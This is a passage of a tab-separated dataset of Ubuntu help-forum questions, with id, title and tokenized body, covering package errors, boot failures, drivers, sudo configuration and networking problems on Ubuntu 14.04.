504562	dpkg issue - package can not be deleted	i installed a .deb package and it did not get installed properly . now , when i try to remove it by sudo apt-get -- purge remove < packagename > or sudo dpkg remove < packagename > i get e : the package < packagename > needs to be reinstalled , but i ca n't find an archive for it . i also followed this article , http : //www.cyberciti.biz/tips/troubleshooting-debian-ubuntu-package-upgrades-removals.html which seem to have solved a lot of people 's problems ( check comment ) the link basically tell us to , open cd /var/lib/dpkg/info ls < packagename > in my case , i check the shell scripts , i did not have /bash/sh -e , instead i had set -e. i tried removing set -e ( check comments , it had worked for people ) , but it does not work for me . i also tried removing the package from /var/lib/dpkg/status and /var/lib/dpkg/status-old tried to run update and upgrade commands , still it did not work . can someone help me out here also explain what is this issue . seems like a lot of people are stuck on this issue for days . ty
504566	why wget prints many new lines of status when downloading ( using putty ) ?	why wget prints many new lines , when connecting to an ubuntu machine via a remote terminal session like putty ? the issue is not just in wget but in byobu as well . both programs behave queer . i assume the trouble is somewhere in config of the system . how can i fix this issue ?
504570	about ubuntu release suitable for my machine	mine is an old system processor amd sempron ( tm ) 3400+ 1.8 ghz installed memory ( ram ) 1.25gb ( 1.12gb usable ) system type 32 bit operating system i am using this system in my home mainly for net surfing only suggest which version and release is suitable for me
504577	reverting to open-source radeon driver shows low resolution graphics	i have tried to install the fglrx proprietary drivers for my radeon 9000 ( rv250 ) graphics card . this did n't work so i tried to revert to the open-source version based on this page ( purge fglrx ) to uninstall fglrx and install the open-source version . it seems like i ca n't change the resolution from the very low 640 x 480 and the catalyst icons are still visible in the settings manager . i am running xubuntu 14.04 . there was no problem prior to the attempt at installing the proprietary version . the following command outputs may help : lspci -nn | grep vga 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] rv250 [ radeon 9000 series ] [ 1002:4966 ] ( rev 01 ) dmesg | egrep 'drm|radeon' ... .. no output is produced after the last command .
504579	system processes	how can i see the system processes ( only ) running on my computer ? i have tried ps , ps -e etc but always i get the user process + system processes . ( i have kept firefox open , i am also getting it.though it 's not system process . )
504583	setting up proxy in ubuntu server 14.04	what is proxy ? why do we need proxy and for what purpose ? i am new to server . when i was installing ubuntu server . installation prompt is asking me for a proxy information `` h ttp : // [ [ user ] [ : pass ] @ ] host [ : port ] / '' . now what should i do .
504587	network-admin for server ?	i am running a 12.04 distro . i am looking for something that can run in command line on my server that would give me access to change the network settings . similar programs would be network-admin or netconf but these require the graphical interface which i do not have on my server . only command line . any suggested packages ? edit i was hoping that i can change the ip address , dns , gateway and such and have those settings saved for reboot . i 've set a static ip with ifconfig before but upon reboot it seemed to go back the default network ip . i removed the gui to limit process and space taken up . the embedded device i am using does not have a huge storage . it is actually an arm system distro . i went into the /etc/network/interfaces file and it seemed to not have any settings saved for primary network . i was really hoping there would be an easy way to accomplish this , something like address x.x.x.x that it will take what the network address is versus a static ? if that makes sense .
504588	i want to know how to get `` gnome '' started	i just installed ubuntu server 12.04 32 bit and want to know how to get the gnome gui up and running . can anyone help ?
504589	how do i re-assign disc space to chromeos that 's assigned to ubuntu on a chromebook ?	i tried installing ubuntu on to my hp chromebook 11 ( to no avail ) but in that process , i assigned 10 gb of disk space to the ubuntu os . how do i re-assign that 10 gb of disk space to chromeos using chromeos ? i 've already tried powerwashing my chromebook . the original tutorial : https : //www.youtube.com/watch ? v=4qpjtzav3kw foot note : would it be possible to go through the process and just set the designated disk space to about 2 gb ?
504590	what 's the difference between dual booting and a virtual installation ?	i just want to know , what are the disadvantages of using ubuntu in vmware rather than then dual booting it ? does ubuntu get restricted somehow under vmware ? and suppose if i install code : :blocks for ubuntu ( installed through virtual machine ) and then shutdown the os . if i start ubuntu once again , will code : :blocks still be present inside ubuntu ?
504593	ubuntu update caused system to freeze on boot at purple screen . recovery mode fails and brings up busybox	i 've searched through existing questions , but nothing addresses my problem . my system running ubuntu 14.04 went through a partial-update a few days ago . ever since , my system will not boot . it freezes on the purple screen . ( plymouth ? ) when i attempt to boot to recovery , i get a `` gave up waiting for root '' error along with numerous libkmod errors . i 've booted from a livecd and attempted some troubleshooting . i can mount the root partition from there and chroot over . i checked /var/log/boot and found 2 small failures - samba and ksplice - nothing that should prevent booting . i tried to reinstall grub with the following , after mounting the boot partition to /boot : sudo grub-install -- efi-directory=/boot /dev/sdc unfortunately , this produces the same libkmod errors that appear when i try to get to recovery . ( i do have an efi , not bios ) here 's what recovery ends with : gave up waiting for root device . common problems : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; is /dev ) alert ! /dev/mapper/ubuntu -- vg-root does not exist . dropping to a shell ! libkmod : error ../libkmod/libkmod-config.c:686 kmod_config_parse : /etc/modprobe.d/zfs.conf line 2 : ignoring bad line starting with ' # ' libkmod : error ../libkmod/libkmod-config.c:686 kmod_config_parse : /etc/modprobe.d/zfs.conf line 3 : ignoring bad line starting with ' # ' libkmod : error ../libkmod/libkmod-config.c:686 kmod_config_parse : /etc/modprobe.d/zfs.conf line 4 : ignoring bad line starting with ' # ' libkmod : error ../libkmod/libkmod-config.c:686 kmod_config_parse : /etc/modprobe.d/zfs.conf line 5 : ignoring bad line starting with ' # ' libkmod : error ../libkmod/libkmod-config.c:686 kmod_config_parse : /etc/modprobe.d/zfs.conf line 2 : ignoring bad line starting with ' # ' libkmod : error ../libkmod/libkmod-config.c:686 kmod_config_parse : /etc/modprobe.d/zfs.conf line 3 : ignoring bad line starting with ' # ' libkmod : error ../libkmod/libkmod-config.c:686 kmod_config_parse : /etc/modprobe.d/zfs.conf line 4 : ignoring bad line starting with ' # ' libkmod : error ../libkmod/libkmod-config.c:686 kmod_config_parse : /etc/modprobe.d/zfs.conf line 5 : ignoring bad line starting with ' # ' libkmod : error ../libkmod/libkmod-config.c:686 kmod_config_parse : /etc/modprobe.d/zfs.conf line 2 : ignoring bad line starting with ' # ' libkmod : error ../libkmod/libkmod-config.c:686 kmod_config_parse : /etc/modprobe.d/zfs.conf line 3 : ignoring bad line starting with ' # ' libkmod : error ../libkmod/libkmod-config.c:686 kmod_config_parse : /etc/modprobe.d/zfs.conf line 4 : ignoring bad line starting with ' # ' libkmod : error ../libkmod/libkmod-config.c:686 kmod_config_parse : /etc/modprobe.d/zfs.conf line 5 : ignoring bad line starting with ' # ' i have zfs installed , but the boot drive is not zfs . i do n't understand why commented out lines would be interpreted as bad . here 's my fstab : # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/ubuntu -- vg-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sdb2 during installation uuid=10d83bf1-14a9-40bf-8ada-7ffbf6220bf9 /boot ext2 defaults 0 2 # /boot/efi was on /dev/sdb1 during installation uuid=bd9b-ea73 /boot/efi vfat defaults 0 1 /dev/mapper/ubuntu -- vg-swap_1 none swap sw 0 0 and parted info for my boot drive : model : ata corsair cssd-v32 ( scsi ) disk /dev/sdc : 32.0gb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags 1 1049kb 538mb 537mb fat32 boot 2 538mb 794mb 256mb ext2 3 794mb 32.0gb 31.2gb lvm i have no other oses installed . i 've tried to reinstall from the livecd , but it does not recognize my existing install - even after i mount my root partition manually . i would prefer to avoid re-installing from scratch , and would really like to learn what is causing this for my own linux knowledge betterment . any help would be greatly appreciated .
504600	how to mount a shared folder in osx to ubuntu 14.04	i want to mount a shared directory on my mac into a folder on my ubuntu server so that i can copy backup files to the mac using some sort of automation . before i even start on the whole automation thing i would like to be able to mount the directory manually . oh how i have googled ! i have come up with many versions the mount command . the one that came closest to working ( that is , it asked for my password and did n't object to the answer ) was this : sudo mount -o user=**** //192.168.1.4/server_backups /files/mountpoint it produced the following error : mount error ( 95 ) : operation not supported am i on the right track ? i have tried various versions of the command . either it fails on authentication or i get the above error . any help or advice would be greatly appreciated , thanks , simon .
504601	re-disabling the root account	in ubuntu by default the su ( root ) password is not not set . i have set it by using the sudo passwd ( see link ) . but i did n't like it . can i go back to my original state .
504602	unable to install vmware player 6.0.3 on ubuntu 14.04 due to missing modules	i am having troubles installing vmware player following the ubuntu official guide i found at this link : https : //help.ubuntu.com/community/vmware/player the main problem is that , whenever i try launching a sudo vmplayer command , anything but the virtual machine monitor manages to start , while all the other components do n't . here is what i obtained after launching the single vmplayer command : modinfo : error : module vmnet not found . modinfo : error : module vmblock not found . modinfo : error : module vmci not found . i already tried patching the vmnet.tar package following one of the guides suggested on the internet , but did n't succeed . could you please help me with this issue ? thank you in advance .
504605	lamp with php 5.3 in ubuntu 14.04	can i get steps to install lamp with php 5.3 and all other supported apps like php_mysql i have tried this http : //stackoverflow.com/questions/24772455/ubuntu-14-04-lts-and-php-5-3 but this did n't work for me .
504610	ubuntu 14.04.1 wont boot from bios using usb install , am i doing something wrong ?	this is my first time messing around with ubuntu . ok so i 've been at this the last few hours and i 'm not sure what 's going wrong.. i 've downloaded the ubuntu 14.04.1 iso twice and confirmed the md5 hash here : md5 hash for ubuntu-14.04.1-desktop-amd64.iso i 've used universal usb installer 1.9.5.5 , linuxlive usb creator 2.8.30 and unetbootin multiple times and still no luck . i 'm using an asus v551lb with bios version s551lb.207 . i have the option to boot straight to the usb from the bios but every time i do the screen flashes once and goes now where , however , if i choose to boot to windows ( from the same menu as the usb ) it boots into it . am i missing something ? appreciate your help .
504611	update manager authentication issues	i am a newbie to ubuntu . i installed ubuntu 14.0.4 and am facing authentication issues with update manager . i am using the same password that i used during installation but the issue yet persists . please help ! ! ! !
504612	dell inspiron 6000 network issues	i cant see wireless connections which i should and could with windows 7 and a wired connection seems unstable , ie shows a connection then i try to use it and it disconnects . i have tried to update the drivers and i see these odd problems . broadcom corporation : wireless 1370 wlan mini-pci card ; this device is using an alternate drive ; broadcom 802.11 luna sta wireless driver ... . and then ... . unknown : unknown this device is using a manually-installed driver i also just got this from trying to read the forms , not sure what to do with the info though broadcom corporation bcm4318 [ airforce one 54g ] 802.11g wireless lan controller [ 14e4:4318 ] ( rev 02 ) on the unknown one the only check-able option is to continue running on that driver
504613	true image alternative	is there any alternative to acronis true image which supports ext4/btrfs and has the same capabilities ? i want : compression partition/disk level and also file level backup and restore image mounting image integrity verification free or non-free , does n't matter .
504615	no sound from headphones suddenly , although it is recognized	my headphones were working fine , but recently stopped working , though they are still recognized . the headphones work perfectly on any other device . i 've searched on the internet , but was n't able to find a solution . i 'm using ubuntu 14.04 on an asus k46cb .
504618	kdesudo does not work in kubuntu 14.04	i recently installed kubuntu 14.04 , after which kdesudo seems to work only half the time . for example : $ kdesudo systemsettings kdesudo ( 29361 ) kdesu : :kdesuprivate : :kcookie : :getxcookie : no x authentication info set for display `` :0.0 '' qprocess : destroyed while process is still running . qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . systemsettings ( 29368 ) : kuniqueapplication : can not find the d-bus session server : `` //bin/dbus-launch terminated abnormally with the following error : no protocol specified autolaunch error : x11 initialization failed. '' systemsettings ( 29367 ) : kuniqueapplication : pipe closed unexpectedly . this never happened in my previous versions ( 12.04 and 13.10 ) , and is quite annoying ... i do n't know of any other way to run systemsettings with root privileges ! i know this bug was reported here , but no one seems to have come up with a solution to that one : - ( i tried removing .xauthority , but that did n't solve the problem . any advice would be really , really welcome : - )
504620	how can i get working subtitleeditor in ubuntu 14.04 ?	subtitleeditor is a great software but undermaintained right now so the version in ubuntu is suboptimal . how can i make it work as good as possible ?
504623	focus application when opening document	how do i get gedit to take focus when i select view/edit file in filezilla in ubuntu 14.04 ?
504626	snmpd on boot is not working as expected	i am monitoring some computers on my enterprise network via snmp . for some reason the snmpd service is not working as expected after reboot on ubuntu hosts . looking at pstree , i can see the snmpd service started under init root node , but requests going to this host fail . if i restart the service with service snmpd restart , it comes under the lightdm/init node and works as expected . is there something i am missing to make snmpd start on boot ? i am using ubuntu 14.04 lts with the gnome-shell interface .
504628	ubunu running low graphics mode	ubuntu seems to be running in low graphics mode after updating it . i have a dedicated amd radeon hd 7670m graphics card . it was working fine before i updated it
504630	a question on mysql command	i want to config postfix . i followed these instructions . on the first step i saw this mysql command : mysql > grant select on servermail . * to 'usermail ' @ '127.0.0.1 ' identified by 'mailpassword ' ; also the description for that is : first we need to create a new user , specific for mail authentication , and we are going to give select permission . finally my question is . is that create an user with name usermail on my ubuntu ?
504631	xubuntu 14.04 - closing lid does n't immediately trigger xscreensaver	when i close the lid of my laptop , it suspends . when i open the lid and push a key , it wakes as expected . if it has been five minutes ( the timer for xscreensaver ) , the screen will be locked . if it has been less than five minutes , the screen will not be locked . suspending from the user menu ( action buttons panel plugin ) works correctly , i.e . xscreensaver is triggered and locks the screen on wake . light locker is disabled , and i 'm using xscreensaver . xscreensaver settings : blank after 5 minutes lock screen after 0 minutes xscreensaver 's power management options are disabled . power manager settings : on ac - > when laptop lid is closed - > suspend on battery - > when laptop lid is closed - > suspend extended - > lock screen when goin for suspend/hibernate - > checked initial install was xubuntu 13.04 , then updated to 13.10 , and finally 14.04 . problem did not exist with initial 14.04 upgrade . uname -srvpio = linux 3.13.0-32-generic # 57-ubuntu smp tue jul 15 03:51:12 utc 2014 i686 i686 gnu/linux laptop model : asus x53e manually locking screen , or timer activated screensaver before screen closure remains locked after wake .
504638	view ubuntu local desktop remotely	i 'm just wondering we have linux ubuntu installed on one of our pc in the office and we use tightvnc to view it and i 'm working remotely . how come the desktop i view from the tightvnc is different from the desktop they 're viewing locally ? is there a way i can view the desktop that they are viewing as well ? i can login on one of the pc in the office by using tightvnc and use that pc again to login on the linux pc by entering ipaddress:1 on tightvnc i tried ipaddress:0 but it said that the machine actively refused it but if i do ipaddress:1 i can access it . it would really help me bigtime if i can view the desktop that they are viewing . thank you
504639	linux - keyboard with phone-like typing	i have a usb keyboard extension with just number-keys : i need to write chars ( a to z ) on this keyboard . my idea is write the way you can on some phone keypads , where each number is mapped to several letters . in other words , if i press `` 1 '' twice , it writes a , two presses on `` 2 '' selects b , four presses on 9 represents z . ( see photo . each press moves to the next consecutive letter mapped to each key . ) is this possible ?
504643	14.04 lts not loading after pakage update of 12.04 lts	system : dell studio 1510 installed 1 . windows 8.1 2 . ubuntu 12.04 lts 3 . ubuntu 14.04 lts.. after updating packages in 12.04 lts not getting the option to load 14.04 in grub loader grub loader looks like this after the pakage update in 12.04 ubuntu , with linux 3.2.0-67- generic ubuntu , with linux 3.2.0-67- generic ( recovery mode ) previous linux versions memory test ( mmtest 86+ ) memory test ( mmtest 86+ , serial console 115200 ) windows 8 ( loader ) ( on /dev/sda02 ) ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os 'gnu-linux-sinple-a62007e67- ubuntu , with linux 3.13.0.32 generic ' -- class ubuntu -- calss gnu-linux ... . ubuntu , with linux 3.13.0.32 generic ( recovery mode ) -- class ubuntu -- calss ... . ubuntu , with linux 3.13.0.29 generic -- class ubuntu -- calss ... .. ubuntu , with linux 3.13.0.29 generic ( recovery mode ) -- class ubuntu -- calss ... . ubuntu , with linux 3.13.0.27 generic -- class ubuntu -- calss ... ... ubuntu , with linux 3.13.0.27 generic ( recovery mode ) -- class ubuntu -- calss ... . ubuntu , with linux 3.13.0.24 generic -- class ubuntu -- calss ... ... ... .. ubuntu , with linux 3.13.0.24 generic ( recovery mode ) -- class ubuntu -- calss etc ... . ... what went wrong and how to recover back my 14.04 lts along with otherr os without reinstalling 14.04 lts..
504644	why scsi_id not found in my ubuntu ?	why scsi_id not found in my ubuntu ? $ scsi_id scsi_id : command not found no you can install it by typing : sudo apt-get install package prompt is provided . using ubuntu 14.04 .
504645	need help with disk space	i dual booted ubuntu ( alongside windows 7 ) with a thumb drive , so i cant take off ubuntu , but when i installed it i choose the default disk space for windows and ubuntu , but i need more for ubuntu , without reinstalling ( or un-installing , or programming ) is there any way i can add more ? ? ? this is the video i based installing ubuntu on - > `` https : //www.youtube.com/watch ? v=1uvcsfhv2vo ''
504646	ubuntu install on external drive without touching the internal one	i thought that would be common question , but i could not find an answer so far . how do i avoid grub2 to be installed at all ? whatever i try it always gets installed an than i ca n't boot windows from internal disk when the external disk ( with ubuntu ) is disconnected .
504651	install ruby , rails , gems , passenger for 1.8.7 on ubuntu 14.04	i am trying to move a ruby site to a new host that 's running ubuntu 14.04 , but it needs ruby 1.8.7 . i can use rvm to install 1.8.7 , but i 'm unsure of how to get rails , gems , and passenger working for this version as well . what do i need to run to set up rails , gems , and passenger for ruby 1.8.7 on my new ubuntu machine ?
504652	adding nopasswd in /etc/sudoers does n't work	on 14.04 here . i sshed into my machine , added the following line to /etc/sudoers : myuser all=nopasswd : all and then tried running : sudo mkdir /etc/blah ... and i 'm being asked for my password . why ? ! ? i do not want to be asked for my password when doing this operation . please note that when i run ls -ltr / i get : drwxr-xr-x 94 root root 4096 jul 30 13:28 etc but i do n't think this matters because i 've set myself up as a `` sudoer '' , right ? more importantly , what do i need to do so that i can run sudo mkdir /etc/blah as my current user ( myuser ) without being asked for the password ? here 's my entire /etc/sudoers file : # # this file must be edited with the 'visudo ' command as root . # # please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file . # # see the man page for details on how to write a sudoers file . # defaults env_reset defaults mail_badpass defaults secure_path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin '' # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all : all ) all fizzbuzz all=nopasswd : all chadmin all=nopasswd : all # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all : all ) all # see sudoers ( 5 ) for more information on `` # include '' directives : # includedir /etc/sudoers.d
504653	new ubuntu convert ca n't access external hard drive files / folders from imac	i overwrote my imac mavericks os with ubuntu 14.04 . since then , i am having difficulties easily moving files and folders from the external hard drive ( used with mavericks ) . i am hoping to be able to at the very least change permissions on all of the files in a `` pictures '' , `` movies '' , '' documents '' folder on the external hard drive . i am a real newbie to linux , but am starting to get the hang of basic terminal commands ( think copy and paste for now ) . i 'd love an app or program that would simplify this . i have installed dolphin which i feel ought to be able to do all of this for me . i am not familiar with how to use it though ! thanks ! ! !
504656	usb gsm/gprs modem + https in ubuntu 14.04	i have neoway m660 gsm/gprs usb modem . and i have ubuntu 14.04 . modem is detected as /dev/ttyusb0 . i need to somehow make https requests to some remote server through that modem . what is the simplest way to integrate usb gsm/gprs modem with some ssl/tls layer with http layer on the top ? is there any ready solution or do i have to code some/all functionality ?
504657	timeout during ssh connection	i have an ubuntu pc in my office . i can use this computer through teamviewer . but i not use ssh connection . this is my office computer : donbeo @ donbeo-optiplex-790 : ~ $ sudo service ssh status [ sudo ] password for donbeo : ssh start/running , process 4093 donbeo @ donbeo-optiplex-790 : ~ $ when i try to log in from remote using ssh i receive a timeout error . this is the result of my ping : donbeo @ donbeo-hp-elitebook-folio-9470m : ~ $ ping 149.157.140.64 ping 149.157.140.64 ( 149.157.140.64 ) 56 ( 84 ) bytes of data . ^c -- - 149.157.140.64 ping statistics -- - 167 packets transmitted , 0 received , 100 % packet loss , time 167327ms donbeo @ donbeo-hp-elitebook-folio-9470m : ~ $ i was able to do ssh connection since few days ago . i do not know why i am not able anymore to connect using ssh . i suppose this is due a software update . ( i am not sure about that ) how can i solve this ?
504658	ubuntu 14.04 does n't load anything after login specific user	i wanted to add additional fonts to my ubuntu installed x220 thinkpad . i google some help and copied the 700 mb of fonts into .fonts directory and then i realized that the system gone very slow so i rebooted . then system booted upto login screen and after entering right password it just shows the wallpapers and nothing works . mouse pointer is accessible though but i noticed system heats up a lot if i keep it for long . hence , i tried reinstalling ubuntu-desktop and unity but , it did n't work . i created another user from command line and there it works fine . i am not able to understand the problem . need help in solving this issue . for more info you can visit this link to see the working video of issues : you tube link my system is as follows : ubuntu 14.04 lts with latest updates lenovo x220 thinkpad updated : strange thing is i removed ubuntu-desktop using tasksel and installed other environment . it still shows the same wallpaper and stuck . does this will help recognizing the issue ?
504659	guides for installing ubuntu 14.04 on a late 2012 imac ?	i 'm having an awfully hard time getting ubuntu to work on a late 2012 imac . i partitioned , installed refind , and was able to boot into ubuntu , but the display is laggy , i get strange flickers , and i ca n't get my apple magic trackpad to pair . in short , a lot of things are broken . is there an up to date install guide for this imac ? all the guides i can find are outdated , and all the similar questions to this one are unanswered .
504660	make ubuntustudio look like regular ubuntu ( i wanted the kernal not the desktop )	i would like to make ubuntu studio 14.04 look like regular ubuntu trusty 14.04 with the unity desktop . please see this screen shot of the default ubuntu studio desktop .
504669	how to restore a déjà dup backup file at command prompt with duplicity	i have used déjà dup backup tool to backup to external hard disk ( /media/toshiba ext/ ) now i want to test the backup . so i deleted one test file ( /home/rch/hecatombe.txt ) . i can restore that file via nautilus `` file = > restore missing files '' ( as at restore a backup from duplicity ) but i prefer to work at the command prompt . so i deleted that test file again , and did this at the command prompt : duplicity restore -- no-encryption `` file : ///media/toshiba ext/ '' `` /home/rch/hecatombe.txt '' but instead of restoring my file hecatombe.txt , duplicity made a new directory hecatombe.txt with contents like this /home/rch/locate_hecatombe.txt/home/rch what am i doing wrong ?
504670	how do i change the default graphics driver from intel to nvidia in ubuntu gnome 14.04 ?	i am using toshiba satellite c50 a2012 , with ubuntu 14.04 and an nvidia graphics card . how do i change my graphics to nvidia from intel graphic card ?
504672	closing a laptop top and keeping ubuntu running	i have a lenovo edge e130 and a problem with ubuntu 14.04 . if i close the top the os is sent to sleep mode . i would like to keep ubuntu running . what exactly is the cause of this behavior ?
504674	deleted by mistake	i deleted a huge folder containing mp3 & mp4 songs by mistake . i thought it will be in trash but when i opened it , the folder was n't there but when i opened the properties of trash i saw that it contained +2000 folders of 55 gb . the files are not visible somehow . can you please tell me how to recover it ? i do n't want this huge loss of my favourite items .
504675	ubuntu 14.04 wo n't boot even after boot-repair-disk	a fresh install of ubuntu14.04 seems successful , but will not boot afterwards . 500gb disk was formatted with gparted to 499gb ext4 with 1mb unallocated prior to installation . repairing with boot-repair-disk seems not to work because upon next boot : `` disk boot failure . insert system disk and press enter . subsequently i have used gparted to move and resize the ubuntu installation and create a 147gb ntfs formatted blank partition . i still get the same `` disk boot failure '' as before . http : //paste.ubuntu.com/7906804 reccommended-repair from boot-repair-disk does not change the boot failure
504680	why does it state that *-cache:1 disabled at lshw command	it seems like my memory is working correctly but i am puzzled by the output of the following command . is the memory disabled and how do i go about testing it if it may be . $ sudo lshw -c memory *-firmware description : bios vendor : american megatrends inc. physical id : 0 version : version 07.00t date : 04/02/01 size : 64kib capacity : 448kib capabilities : isa pci pnp apm upgrade shadowing escd cdboot bootselect socketedrom edd int13floppy360 int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int17printer int10video acpi usb agp ls120boot zipboot biosbootspecification *-cache:0 description : l1 cache physical id : 5 slot : internal cache size : 48kib capacity : 1mib capabilities : pipeline-burst synchronous internal write-back data *-cache:1 disabled description : l2 cache physical id : 6 slot : internal cache size : 1mib capacity : 1mib capabilities : synchronous internal write-back unified *-memory description : system memory physical id : 1 size : 1508mib
504687	problem while updating shotwell	the last update of shotwell is causing me troubles while updating my system . i tried with sudo apt-get install -f and i got this error message : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : shotwell the following packages will be upgraded : shotwell 1 upgraded , 0 newly installed , 0 to remove and 12 not upgraded . need to get 0 b/7,511 kb of archives . after this operation , 25.3 mb of additional disk space will be used . do you want to continue ? [ y/n ] y ( reading database ... 299243 files and directories currently installed . ) preparing to unpack ... /shotwell_0.18.1-1~trusty1_i386.deb ... unpacking shotwell ( 0.18.1-1~trusty1 ) over ( 0.18.0-0ubuntu4.1 ) ... dpkg : error processing archive /var/cache/apt/archives/shotwell_0.18.1-1~trusty1_i386.deb ( -- unpack ) : trying to overwrite '/usr/share/shotwell/icons/shotwell-16.svg ' , which is also in package shotwell-common 0.18.0-0ubuntu4.2 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for man-db ( 2.6.7.1-1 ) ... processing triggers for menu ( 2.1.46ubuntu1 ) ... errors were encountered while processing : /var/cache/apt/archives/shotwell_0.18.1-1~trusty1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) is there any chance of fixing this ?
504688	can i automate filesystem cleanup ?	i have a multi-user system and recently started receiving messages saying low disk space in filesystem /root and the same for /boot . /boot was at 100 % capacity , so i ran : sudo apt-get autoremove i want to automate this so i do n't have to do it manually . thanks from a first-timer !
504689	ca n't install skype 4.3 on ubuntu 14.04 64 bit	first of all , i think this question is not duplicated , because i have tried all other solutions i found here , but nothing solved my problem . i use ubuntu 14.04 64 bit . i have tried until now : sudo apt-get install skype - > it did n't work . the error was : the following packages have unmet dependencies : skype : depends : skype-bin e : unable to correct problems , you have held broken packages . i have tried sudo dpkg add-architecture & & sudo dpkg -i skype-ubuntu-precise_4.3.0.37-1_i386.deb but it did n't work too . the error was : dpkg : dependency problems prevent configuration of skype : skype depends on libqt4-dbus ( > = 4:4.5.3 ) ; however : package libqt4-dbus is not installed . skype depends on libqt4-network ( > = 4:4.8.0 ) ; however : package libqt4-network : i386 is not installed . skype depends on libqt4-xml ( > = 4:4.5.3 ) ; however : package libqt4-xml : i386 is not installed . skype depends on libqtcore4 ( > = 4:4.7.0~beta1 ) ; however : package libqtcore4 : i386 is not installed . skype depends on libqtgui4 ( > = 4:4.8.0 ) ; however : package libqtgui4 : i386 is not installed . skype depends on libqtwebkit4 ( > = 2.2~2011week36 ) ; however : skype depends on libstdc++6 ( > = 4.2.1 ) ; however : package libstdc++6 : i386 is not installed . skype depends on libx11-6 ; however : package libx11-6 : i386 is not installed . skype depends on libxext6 ; however : package libxext6 : i386 is not installed . skype depends on libxss1 ; however : package libxss1 : i386 is not installed . skype depends on libxv1 ; however : package libxv1 : i386 is not installed . skype depends on dpkg : error processing package skype ( -- install ) : dependency problems - leaving unconfigured processing triggers for hicolor-icon-theme ( 0.13-1 ) ... processing triggers for gnome-menus ( 3.10.1-0ubuntu2 ) ... processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for bamfdaemon ( 0.5.1+14.04.20140409-0ubuntu1 ) ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for mime-support ( 3.54ubuntu1 ) ... errors were encountered while processing : skype i have tried to use after sudo apt-get -f install but it did n't solve . i have tried to install by using gdebi . the error was : can not install 'libqtwebkit4 : i386' i have tried to install using ubuntu software center . the error was : can not install 'libqtwebkit4 : i386' i have tried changing the server in `` softwares and updates '' . i have tried to use `` main server '' and `` servers for united states '' . but it could n't solve my problem . anyone has any idea how to solve that ? solved well , i formatted my pc and i installed skype first of all . probably another installation that i had done before the skype instalation was the problem , i guess . thanks people !
504690	ipython subcommands wo n't work if you alias the `` ipython '' command	i 've changed the question title to match the actual cause of my problem . in my 14.04 setup , ipython 's subcommands do n't work : $ ipython locate [ terminalipythonapp ] warning | file not found : u'locate' this is similar to another problem from earlier releases of ubuntu and ipython . i have the `` stock '' ipython with ubuntu 14.04 . python 2.7.6 ( default , mar 22 2014 , 22:59:56 ) type `` copyright '' , `` credits '' or `` license '' for more information . ipython 1.2.1 -- an enhanced interactive python . i have found that calling ipython2.7 locate , for example , works , and this is a kind of work-around for now , but it generates a warning : $ ipython2.7 locate /usr/lib/python2.7/dist-packages/ipython/frontend.py:30 : userwarning : the top-level `frontend` package has been deprecated . all its subpackages have been moved to the top `ipython` level . warn ( `` the top-level `frontend` package has been deprecated. `` /home/whoever/.config/ipython is there a nice clean way to fix this ?
504694	u1db index and query	im writing a ubuntu touch app with u1db as db , but im getting troubles with query and index . im saving a doc with sub-fields , but at retrieve point with index and query i wont get the expected resutls . i need the list to show two rows one for the account `` ahorro '' another one for the account `` corriente '' but only one row show , the first one . can anyone help me ? here i post my code : ubuntulistview { id : accountlistview anchors.margins : units.gu ( 2 ) anchors.top : accountlabel.bottom anchors.left : parent.left anchors.right : parent.right anchors.bottom : parent.bottom model : accountquery delegate : listitem.singlevalue { text : contents [ `` name '' ] progression : true onclicked : { print ( `` clicked '' ) } } } u1db.database { id : mymoneydb path : `` mymoney.u1db '' } u1db.document { id : accountdocument database : mymoneydb docid : 'account' create : true defaults : { [ { `` name '' : `` ahorro '' } , { `` name '' : `` corriente '' } ] } } u1db.index { database : mymoneydb id : accountindex expression : [ `` account.name '' ] } u1db.query { id : accountquery index : accountindex query : `` * '' } thanks in advance .
504695	i 'm unable to get intel 7260 ( iwlwifi ) to work , kubuntu 14.04	i bought a new asus q302 with the intel 7260 wireless in it because `` hey , it is supposed to work out of the box '' , but it does n't . the computer has wifi only , no ethernet jack . as such , getting wifi working is n't an option . right now i have it online via one of those usb to ethernet adapter dongles . i 've been trolling the internet for the last three days and have followed just about every bit of advice i 've found . i have reinstalled kubuntu 14.04 ( with the 3.13 kernel ) three times , have downloaded the latest .ucode from the intel site ( for 3.13+ kernels ) and installed it in /lib/firmware , i 've tried building the firmware from kernel 3.11 as well ( as seen in this forum post on the intel n 7260 wireless card ) the bluetooth , however did work out of the box , strangely enough . my machine is up to date , i ran apt-get-update more than once . iwconfig says : eth0 no wireless extensions . lo no wireless extensions . modinfo iwlwifi says : laurence @ s : ~ $ modinfo iwlwifi filename : /lib/modules/3.13.0-32-generic/kernel/drivers/net/wireless/iwlwifi/iwlwifi.ko license : gpl author : copyright ( c ) 2003-2013 intel corporation < ilw @ linux.intel.com > version : in-tree : description : intel ( r ) wireless wifi driver for linux firmware : iwlwifi-100-5.ucode firmware : iwlwifi-1000-5.ucode firmware : iwlwifi-135-6.ucode firmware : iwlwifi-105-6.ucode firmware : iwlwifi-2030-6.ucode firmware : iwlwifi-2000-6.ucode firmware : iwlwifi-5150-2.ucode firmware : iwlwifi-5000-5.ucode firmware : iwlwifi-6000g2b-6.ucode firmware : iwlwifi-6000g2a-5.ucode firmware : iwlwifi-6050-5.ucode firmware : 